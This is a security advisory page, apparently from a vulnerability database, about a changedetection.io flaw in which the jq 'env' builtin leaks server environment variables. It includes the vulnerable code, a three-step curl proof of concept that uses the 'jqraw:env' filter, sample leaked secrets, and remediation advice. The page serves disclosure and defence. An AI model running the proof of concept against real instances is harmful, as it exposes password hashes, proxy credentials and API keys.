Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4DescriptionGitHub Advisory
Summary
The jq: and jqraw: include filter expressions allow use of the jq env builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed as env vars to the container.
Details
Vulnerable file: changedetectionio/html_tools.py, lines 380-388
User-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:
if json_filter.startswith("jq:"):
jq_expression = jq.compile(json_filter.removeprefix("jq:"))
match = jq_expression.input(json_data).all()
return _get_stripped_text_from_json_match(match)
if json_filter.startswith("jqraw:"):
jq_expression = jq.compile(json_filter.removeprefix("jqraw:"))
match = jq_expression.input(json_data).all()
return '\n'.join(str(item) for item in match)The form validator at forms.py:670-673 only checks that the expression compiles (jq.compile(input)) - it does not block dangerous functions. The jq env builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.
PoC
Step 1 - Create a watch for any JSON endpoint with jqraw:env as the include filter:
curl -X POST http://target:5000/api/v1/watch \
-H "Content-Type: application/json" \
-H "x-api-key: <api-key>" \
-d '{
"url": "https://httpbin.org/json",
"include_filters": ["jqraw:env"],
"time_between_check": {"seconds": 30}
}'If no password or API key is set (the default), no authentication is needed.
Step 2 - Wait for the watch to be checked, or trigger a recheck:
curl "http://target:5000/api/v1/watch/<uuid>?recheck=true" -H "x-api-key: <api-key>"Step 3 - The processed text file on disk now contains all environment variables:
{'SALTED_PASS': '...hashed password...', 'PLAYWRIGHT_DRIVER_URL': 'ws://browser:3000',
'HTTP_PROXY': 'socks5h://10.10.1.10:1080', 'SHELL': '/bin/bash',
'HOME': '/root', 'PATH': '...', 'WERKZEUG_SERVER_FD': '22',
... and all other env vars}The data is visible in the web UI when viewing the watch's latest snapshot, and is also included in notification messages if notifications are configured.
Confirmed on v0.54.6: The processed text file stored 46 environment variables from the server process.
Impact
- Secret exposure: Leaks
SALTED_PASS(password hash used for authentication), enabling offline cracking or direct session forgery - Infrastructure credential theft: Leaks
PLAYWRIGHT_DRIVER_URL,WEBDRIVER_URL,HTTP_PROXY/HTTPS_PROXY, database connection strings, and any API keys or tokens passed as environment variables - Cascading access: Leaked proxy credentials or browser automation URLs can be used to pivot into other internal systems
- Affects all deployments using jq: Any instance where the Python
jqmodule is installed (standard in Docker deployments) is vulnerable - No authentication required by default: changedetection.io ships with no password and the API accessible without a key, so this is exploitable by any user with network access in the default configuration
AnalysisAI
changedetection.io versions up to 0.54.6 leak all server environment variables including password hashes, proxy credentials, and API keys via unrestricted jq filter expressions. Attackers with API access (default: no authentication required) can extract SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed to the container by creating a watch with 'jqraw:env' as the include filter. Vendor-released patch available in version 0.54.7. No active exploitation confirmed (not in CISA KEV), but a detailed proof-of-concept exists in the GitHub advisory demonstrating full environment variable extraction in three API calls.
Technical ContextAI
changedetection.io is a Python-based web monitoring application that supports jq filter expressions for JSON data extraction. The vulnerable code in html_tools.py (lines 380-388) compiles and executes user-supplied jq expressions without restricting dangerous builtins. The jq 'env' builtin is a sandboxing escape mechanism that reads all process environment variables regardless of input data, bypassing the application's data isolation model. The validator in forms.py only verifies that expressions compile successfully using jq.compile() but does not implement a security policy to block dangerous functions like env, input, or $ENV. This is classified as CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), though it also exhibits characteristics of CWE-74 (Improper Neutralization of Special Elements in Output) due to insufficient sanitization of user-controlled filter expressions. The vulnerability affects pkg:pip/changedetection.io deployed with the Python jq module, which is standard in Docker-based installations.
RemediationAI
Upgrade immediately to changedetection.io version 0.54.7 or later, which implements restrictions on dangerous jq builtins including the env function. The patched code is available in commit 65517a9c74a0cbe1a4661314470b28131ef5557f at https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f, and the fixed release can be downloaded from https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7. For Docker deployments, pull the latest dgtlmoon/changedetection.io:0.54.7 or dgtlmoon/changedetection.io:latest image. As an immediate mitigation before patching, enable authentication by setting a strong password and generating API keys for all API consumers, restricting network access to the application to trusted users only. Review all existing watches for suspicious jq filter expressions containing 'env' and delete any unauthorized watches. Rotate all secrets that were stored as environment variables (passwords, API keys, proxy credentials, database connection strings) assuming potential compromise. Review application logs for API calls to create watches with jqraw: or jq: filters and investigate any suspicious activity. For long-term security, avoid passing sensitive credentials as environment variables; use mounted secret files or secure secret management systems instead.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-200 – Information Exposure
View allSame technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-16880
GHSA-58r7-4wr5-hfx8